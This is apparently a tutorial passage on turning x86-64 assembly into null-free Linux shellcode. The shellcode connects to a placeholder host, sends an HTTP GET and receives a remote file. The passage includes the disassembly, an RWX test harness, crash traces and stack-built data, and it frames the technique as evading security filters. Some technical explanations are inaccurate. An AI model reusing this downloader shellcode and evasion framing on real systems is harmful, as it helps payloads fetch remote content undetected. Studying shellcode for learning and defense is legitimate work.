To continue, we might consider using assembly code to further our goals. We may think about things like inline assembly in the C code. No! What about shellcode? I think it’s really cool to convert our assembly code to shellcode. But it will not be that simple: especially for more complex code, we may have to modify the assembly code so that the shellcode works correctly.
-> but not <-
Have you tried to extract shellcode from assembly code? Or rather, have you tried to convert assembly code to shellcode? It’s not just a matter of copying the bytes of the object code from something like objdump! If you do this, you will see that your shellcode may not act properly. We can always recover assembly from shellcode (by disassembling it), but the other way around is not as straightforward: we can derive shellcode from assembly, but it may not work as expected without modification. For example, let’s convert the previously written assembly code to shellcode and execute that. First, let’s disassemble it with objdump. The result is something like this (for some IP address other than 1.2.3.4):
# objdump -d dl.o
dl.o: file format elf64-x86-64
Disassembly of section .text:
0000000000000000 <_start>:
0: 48 c7 c0 29 00 00 00 mov $0x29,%rax
7: 48 c7 c7 02 00 00 00 mov $0x2,%rdi
e: 48 c7 c6 01 00 00 00 mov $0x1,%rsi
15: 48 c7 c2 06 00 00 00 mov $0x6,%rdx
1c: 0f 05 syscall
1e: 48 85 c0 test %rax,%rax
21: 78 71 js 94 <_exit>
23: 48 89 c7 mov %rax,%rdi
26: 48 c7 c0 2a 00 00 00 mov $0x2a,%rax
2d: 48 8d 35 00 00 00 00 lea 0x0(%rip),%rsi # 34 <_start+0x34>
34: 48 c7 c2 10 00 00 00 mov $0x10,%rdx
3b: 0f 05 syscall
3d: 48 85 c0 test %rax,%rax
40: 78 52 js 94 <_exit>
42: 48 c7 c0 2c 00 00 00 mov $0x2c,%rax
49: 48 8d 35 00 00 00 00 lea 0x0(%rip),%rsi # 50 <_start+0x50>
50: 48 c7 c2 00 10 00 00 mov $0x1000,%rdx
57: 0f 05 syscall
59: 48 85 c0 test %rax,%rax
5c: 78 36 js 94 <_exit>
5e: 48 c7 c0 2d 00 00 00 mov $0x2d,%rax
65: 48 8d 35 00 00 00 00 lea 0x0(%rip),%rsi # 6c <_start+0x6c>
6c: 48 c7 c2 00 10 00 00 mov $0x1000,%rdx
73: 0f 05 syscall
75: 48 85 c0 test %rax,%rax
78: 7e 1a jle 94 <_exit>
7a: 48 89 c2 mov %rax,%rdx
7d: 48 c7 c0 01 00 00 00 mov $0x1,%rax
84: 48 c7 c7 01 00 00 00 mov $0x1,%rdi
8b: 48 8d 35 00 00 00 00 lea 0x0(%rip),%rsi # 92 <_start+0x92>
92: 0f 05 syscall
0000000000000094 <_exit>:
94: 48 c7 c0 3c 00 00 00 mov $0x3c,%rax
9b: 48 31 ff xor %rdi,%rdi
9e: 0f 05 syscall
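And we can use the byte codes to generate our shellcode. (Note that this regular expression matches every two-digit hex token surrounded by whitespace, so besides the instruction bytes it also picks up the jump targets and comment offsets printed in the disassembly column, such as the 94 in "js 94 <_exit>" and the 34 in "# 34 <_start+0x34>"; these show up as stray bytes in the output below.)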
# objdump -d dl.o | grep -Po '\s\K[a-f0-9]{2}(?=\s)' | sed 's/^/\\x/g' | perl -pe 's/\r?\n//' | sed 's/$/\n/'
\x48\xc7\xc0\x29\x00\x00\x00\x48\xc7\xc7\x02\x00\x00\x00\x48\xc7\xc6\x01\x00\x00\x00\x48\xc7\xc2\x06\x00\x00\x00\x0f\x05\x48\x85\xc0\x78\x71\x94\x48\x89\xc7\x48\xc7\xc0\x2a\x00\x00\x00\x48\x8d\x35\x00\x00\x00\x00\x34\x48\xc7\xc2\x10\x00\x00\x00\x0f\x05\x48\x85\xc0\x78\x52\x94\x48\xc7\xc0\x2c\x00\x00\x00\x48\x8d\x35\x00\x00\x00\x00\x50\x48\xc7\xc2\x00\x10\x00\x00\x0f\x05\x48\x85\xc0\x78\x36\x94\x48\xc7\xc0\x2d\x00\x00\x00\x48\x8d\x35\x00\x00\x00\x00\x6c\x48\xc7\xc2\x00\x10\x00\x00\x0f\x05\x48\x85\xc0\x7e\x1a\x94\x48\x89\xc2\x48\xc7\xc0\x01\x00\x00\x00\x48\xc7\xc7\x01\x00\x00\x00\x48\x8d\x35\x00\x00\x00\x00\x92\x0f\x05\x48\xc7\xc0\x3c\x00\x00\x00\x48\x31\xff\x0f\x05
Now, let’s execute the shellcode to see if it works correctly. We can test that with a simple C program:
#include <stdio.h>
#include <string.h>
#include <sys/mman.h>
/*
 * Shellcode test harness.
 *
 * Maps an anonymous readable/writable/executable region, copies the
 * shellcode bytes into it and calls the region as a function.
 * Returns 1 when the mapping cannot be created; returns 0 if the
 * shellcode hands control back to the caller.
 */
int main(int argc, char **argv) {
    /* Bytes pasted from the objdump pipeline; sizeof(payload) also counts
       the terminating NUL that the string literal appends. */
    unsigned char payload[] =
        "\x48\xc7\xc0\x29\x00\x00\x00\x48\xc7\xc7\x02"
        "\x00\x00\x00\x48\xc7\xc6\x01\x00\x00\x00\x48"
        "\xc7\xc2\x06\x00\x00\x00\x0f\x05\x48\x85\xc0"
        "\x78\x71\x94\x48\x89\xc7\x48\xc7\xc0\x2a\x00"
        "\x00\x00\x48\x8d\x35\x00\x00\x00\x00\x34\x48"
        "\xc7\xc2\x10\x00\x00\x00\x0f\x05\x48\x85\xc0"
        "\x78\x52\x94\x48\xc7\xc0\x2c\x00\x00\x00\x48"
        "\x8d\x35\x00\x00\x00\x00\x50\x48\xc7\xc2\x00"
        "\x10\x00\x00\x0f\x05\x48\x85\xc0\x78\x36\x94"
        "\x48\xc7\xc0\x2d\x00\x00\x00\x48\x8d\x35\x00"
        "\x00\x00\x00\x6c\x48\xc7\xc2\x00\x10\x00\x00"
        "\x0f\x05\x48\x85\xc0\x7e\x1a\x94\x48\x89\xc2"
        "\x48\xc7\xc0\x01\x00\x00\x00\x48\xc7\xc7\x01"
        "\x00\x00\x00\x48\x8d\x35\x00\x00\x00\x00\x92"
        "\x0f\x05\x48\xc7\xc0\x3c\x00\x00\x00\x48\x31"
        "\xff\x0f\x05";
    const size_t payload_len = sizeof(payload);

    /* The region must be writable for the copy and executable for the call. */
    void *region = mmap(NULL, payload_len,
                        PROT_READ | PROT_WRITE | PROT_EXEC,
                        MAP_PRIVATE | MAP_ANON, -1, 0);
    if (region == MAP_FAILED) {
        perror("mmap");
        return 1;
    }

    memcpy(region, payload, payload_len);

    /* Treat the start of the mapping as a function and jump into it. */
    void (*entry)() = (void (*)())region;
    entry();

    return 0;
}
Compile it statically, and even disable the stack protections:
# gcc --static -fno-stack-protector -z execstack test_shell.c -o test_shell
If we execute the compiled program, we see that it does not work as expected (it may stop with a segmentation fault, make wrong syscalls, etc.):
# ./test_shell
Segmentation fault (core dumped)
#strace ./test_shell
execve("./test_shell", ["./test_shell"], 0x7ffc1ac95500 /* 19 vars */) = 0
arch_prctl(0x3001 /* ARCH_??? */, 0x7ffc8d4c7890) = -1 EINVAL (Invalid argument)
brk(NULL) = 0x1a2a000
brk(0x1a2adc0) = 0x1a2adc0
arch_prctl(ARCH_SET_FS, 0x1a2a3c0) = 0
set_tid_address(0x1a2a690) = 1338816
set_robust_list(0x1a2a6a0, 24) = 0
rseq(0x1a2ad60, 0x20, 0, 0x53053053) = 0
uname({sysname="Linux", nodename="XXXXXXXX", ...}) = 0
prlimit64(0, RLIMIT_STACK, NULL, {rlim_cur=8192*1024, rlim_max=RLIM64_INFINITY}) = 0
readlink("/proc/self/exe", "/home/XXX/XXXXX/shell/test_shell", 4096) = 25
getrandom("\xb4\xab\xfc\x2d\x89\x59\x51\x89", 8, GRND_NONBLOCK) = 8
brk(0x1a4bdc0) = 0x1a4bdc0
brk(0x1a4c000) = 0x1a4c000
mprotect(0x4c1000, 16384, PROT_READ) = 0
mmap(NULL, 169, PROT_READ|PROT_WRITE|PROT_EXEC, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7f740107d000
socket(AF_INET, SOCK_STREAM, IPPROTO_TCP) = 3
getrusage(0x8d4c7638 /* RUSAGE_??? */, 0x7f740107d035) = -1 EINVAL (Invalid argument)
--- SIGSEGV {si_signo=SIGSEGV, si_code=SEGV_MAPERR, si_addr=0xffffffffffffffea} ---
+++ killed by SIGSEGV (core dumped) +++
Segmentation fault (core dumped)
So, what could be wrong with that?!
Null Bytes
Again, if we look at the shellcode carefully, we will see some bytes like 0x00. These bytes are known as null bytes. A null byte, represented as \0 in programming, is a character with an ASCII value of zero. It is often used to signify the end of a string in languages like C and C++. This special character plays a crucial role in string manipulation and memory management, marking the termination point of a string so that functions know where the string ends. The presence of null bytes in shellcodes can cause significant issues:
- Premature Termination: Many functions that handle strings, such as strcpy in C, treat the null byte as the end of the string. If a shellcode contains null bytes, these functions may terminate the copy operation prematurely, leading to incomplete execution of the shellcode.
- Execution Failures: Shellcodes are often injected into memory spaces where they need to be executed without interruption. Null bytes can disrupt this process, causing the shellcode to fail or behave unpredictably.
- Detection and Prevention: Security mechanisms may detect null bytes as anomalies, flagging the shellcode as malicious. This can lead to the shellcode being blocked or removed before it can execute.
Preventing null bytes in shellcodes is essential for several reasons:
- Ensuring Complete Execution: By avoiding null bytes, we ensure that the entire shellcode is copied and executed as intended. This is crucial for the success of the exploit.
- Bypassing Security Filters: Many security systems and filters are designed to detect and block shellcodes containing null bytes. Crafting shellcodes without null bytes helps in evading these defenses.
- Maintaining Stealth: Null-free shellcodes are less likely to be detected by security mechanisms, allowing the exploit to proceed without raising alarms.
For example, null bytes in our shellcode can cause a segmentation fault. This can have various reasons, including:
- String Termination: As I said before, in C, null bytes (\0) are used to terminate strings. If the shellcode is treated as a string, the presence of null bytes can cause it to be truncated, leading to incomplete execution and potential segmentation faults.
- Memory Misalignment: Null bytes can cause memory misalignment issues. If the shellcode is not properly aligned in memory, it can lead to invalid memory access, resulting in segmentation faults.
- Null Pointer Dereferencing: If the shellcode inadvertently sets a pointer to NULL and then tries to dereference it, this will cause a segmentation fault because the program is trying to access an invalid memory location.
- System Call Arguments: Null bytes in the shellcode might affect the arguments passed to system calls. If a system call receives an unexpected null byte, it might interpret the arguments incorrectly, leading to invalid operations and segmentation faults.
- …
So it seems that the presence of null bytes makes our shellcode not work properly and we cannot use it to advance our goals(even though the assembly code works properly). So, let’s go see if we can make our shellcode null-free or not.
Null-free shellcode
I am determined to make the shellcode null-free, and I should say, I’m not bored explaining everything, and in my opinion, everyone who reads this can understand it completely(Otherwise here is the wrong place for him/her 😀 ).
Good! you have read this and checked the code carefully. As you know, there is some stuff in the .data section that was used in the .text section of the code(like sockaddr structure). For example, take a look at the following code:
lea sockaddr(%rip), %rsi
Its counterpart in the disassembled code is:
lea 0x0(%rip),%rsi
As you know, the instruction computes the address of the sockaddr structure, which is defined in the .data section, relative to the current instruction pointer, and then stores this address in the %rsi register. So, what is 0x0(%rip)? Taken literally, it means the address is exactly the current value of rip, which is nonsense 😀 but totally normal: in an unlinked object file the assembler cannot resolve the sockaddr address, so it leaves a zero displacement as a placeholder for the linker to fill in. Copying these bytes verbatim therefore yields a shellcode that points at the wrong address. So, the technique I will use for this challenge is removing the .data section and bringing everything into the .text section by building the data on the stack.
The sockaddr structure represents an IPv4 socket address, which includes the address family (.word 2, or AF_INET for IPv4), the port number (.word 0x5000), the IP address (.byte 1, 2, 3, 4 in our example) and padding to make the structure 16 bytes.
As I said above, we need 16 bytes to store the sockaddr structure. So if we want to use the stack to do the job, we need to allocate 16 bytes on the stack:
# Reserve 16 bytes on the stack for the sockaddr structure.
sub $16, %rsp
Now, we should set the address family(2). There are two ways for doing this:
# Store the address family (2) at offset 0 of the structure without
# encoding a zero byte: push takes an 8-bit immediate, and the matching
# 64-bit pop keeps %rsp pointing at the start of the 16-byte structure.
push $2
pop %rax            # 64-bit pop balances the 8 bytes pushed above
mov %ax, (%rsp)     # write the low 16 bits (0x0002) at offset 0
And:
# Alternative: load the family directly. The 16-bit immediate 0x0002 is
# encoded as the bytes 02 00, so this form puts a null byte in the shellcode.
mov $0x2, %ax
mov %ax, (%rsp)
I choose the first one, because the second may create a null byte. You can test it 😀
The last instruction moves the value in ax(which is 2) to the memory location pointed to by rsp(the top of the stack).
For port number:
# Build the port word 0x5000 without a zero byte in any immediate.
mov $0x1001, %ax    # ax = 0x1001
shl $2, %ax         # ax = 0x4004
add $0x0ffc, %ax    # ax = 0x5000
mov %ax, 2(%rsp)    # stored as bytes 00 50 at offset 2, i.e. port 80 in network byte order
Or simply:
# Direct form: the immediate 0x5000 is encoded as the bytes 00 50,
# so it contains a null byte.
mov $0x5000, %ax
mov %ax, 2(%rsp)
But I certainly choose the first one, and you know why 😀
For IP address:
# Store the IPv4 address 1.2.3.4 at offsets 4..7 as two 16-bit words.
# Each word is written little-endian, so the low byte of the immediate
# lands at the lower address.
mov $0x0201, %ax    # bytes 01 02 -> offsets 4, 5
mov %ax, 4(%rsp)
mov $0x0403, %ax    # bytes 03 04 -> offsets 6, 7
mov %ax, 6(%rsp)
The second instruction moves this value into the memory location 4 bytes above the top of the stack, and the fourth does the same at offset 6.
Or we can change to:
# Same address written with a single 32-bit store: the little-endian
# dword 0x04030201 becomes the bytes 01 02 03 04 (1.2.3.4) in memory.
mov $0x04030201, %eax
mov %eax, 4(%rsp)   # offsets 4..7 of the structure
And let’s zero out remaining bytes:
# Clear the 8 remaining bytes of the structure (offsets 8..15)
# with four 16-bit stores of zero.
xor %eax, %eax      # eax = 0 without encoding a zero immediate
mov %ax, 8(%rsp)
mov %ax, 10(%rsp)
mov %ax, 12(%rsp)
mov %ax, 14(%rsp)
That’s it for the sockaddr 🙂 and the same approach for the number of bytes for the connect syscall:
# connect syscall: number 42 in %rax, sockaddr pointer in %rsi, length 16 in %rdx.
# NOTE(review): assumes %rdi still holds the socket fd - confirm against the full listing.
xor %eax, %eax
mov $42, %al        # set only the low byte so the immediate has no zero bytes
mov %rsp, %rsi      # the sockaddr was built at the top of the stack
push $16
pop %rdx            # rdx = 16 via push/pop instead of a 32-bit immediate
syscall
We have another .data section that includes url, the path of the remote file, the http request, and the IP address. Ignore everything but http_request. We should give it the same hell we gave to sockaddr.
Consider the “GET /f HTTP/1.1\r\nHost: 1.2.3.4\r\nConnection: close\r\n\r\n” request line and headers (for simplicity I have removed some headers and changed /file.txt to /f). We can build the request easily on the stack:
# Build the HTTP request in a 64-byte stack buffer, eight bytes at a time.
# Each 64-bit immediate is stored little-endian, so its lowest byte is the
# first character of the chunk. Spaces pad the request so that it fills the
# buffer exactly and every chunk is free of null bytes:
# "GET /f  HTTP/1.1\r\nHost: 1.2.3.4\r\nConnection:" + 11 spaces + "close\r\n\r\n"
sub $64, %rsp
mov $0x0a0d0a0d65736f6c, %rax # "lose\r\n\r\n"
mov %rax, 56(%rsp)
mov $0x6320202020202020, %rax # "       c"
mov %rax, 48(%rsp)
mov $0x202020203a6e6f69, %rax # "ion:    "
mov %rax, 40(%rsp)
mov $0x7463656e6e6f430a, %rax # "\nConnect"
mov %rax, 32(%rsp)
mov $0x0d342e332e322e31, %rax # "1.2.3.4\r"
mov %rax, 24(%rsp)
mov $0x203a74736f480a0d, %rax # "\r\nHost: "
mov %rax, 16(%rsp)
mov $0x312e312f50545448, %rax # "HTTP/1.1"
mov %rax, 8(%rsp)
mov $0x2020662f20544547, %rax # "GET /f  "
mov %rax, 0(%rsp)
Now, continue to use that in our sendto syscall:
# sendto syscall (number 44): buffer in %rsi, length in %rdx, remaining arguments zeroed.
# NOTE(review): assumes %rdi still holds the socket fd - confirm against the full listing.
xor %eax, %eax
mov $44, %al        # set only the low byte so the immediate has no zero bytes
mov %rsp, %rsi      # the request buffer starts at the top of the stack
push $64
pop %rdx            # rdx = 64; NOTE(review): must equal the number of bytes stored in the buffer
xor %r10,%r10       # fourth argument = 0
xor %r8,%r8         # fifth argument = NULL
xor %r9,%r9         # sixth argument = 0
syscall
add $64, %rsp # Clean up the stack
Here, we used the data built on the stack as the second argument (%rsi) of the sendto syscall. The length of the buffer, 64, is the third argument (%rdx). The remaining arguments (0, NULL and 0) are set by the xor instructions. Note that we must set these arguments explicitly; otherwise the kernel would use whatever values happen to be left in those registers.
Finally, for the recvfrom syscall:
# recvfrom syscall (number 45): receive into the buffer at %rsp, size computed in %rdx.
# NOTE(review): the buffer starts at %rsp and extends 16384 bytes upward; this snippet
# reserves no stack space for it - confirm that overwriting that region is acceptable.
# NOTE(review): %r8/%r9 are not set here; presumably still zero from the sendto setup - confirm.
xor %eax, %eax
mov $45, %al        # set only the low byte so the immediate has no zero bytes
mov %rsp, %rsi
xor %rdx, %rdx
mov $0x101, %rdx    # the 32-bit immediate 0x00000101 is what still encodes zero bytes
shl $4, %rdx        # rdx = 0x1010
shl $2, %rdx        # rdx = 0x4040
sub $0x40, %rdx     # rdx = 0x4000 = 16384
xor %r10,%r10       # fourth argument = 0
syscall
The buffer is on the stack, passed as the second argument (%rsi) and pointed to by %rsp. The third argument is the buffer size, which I set to 16384.
Now, the party is over 😀 and if you check the null bytes in the shellcode you may see one, just for 0x101 that is not important(of course you can remove it by some mathematical operations to set the third argument of recvfrom syscall, but it’s up to you 😀 )
The code was pushed here (but for a different IP address, not 1.2.3.4).
And then…?
Don’t keep asking “then what, then what…” But what do you think: could we load and execute this shellcode directly in memory, without touching the disk? 😀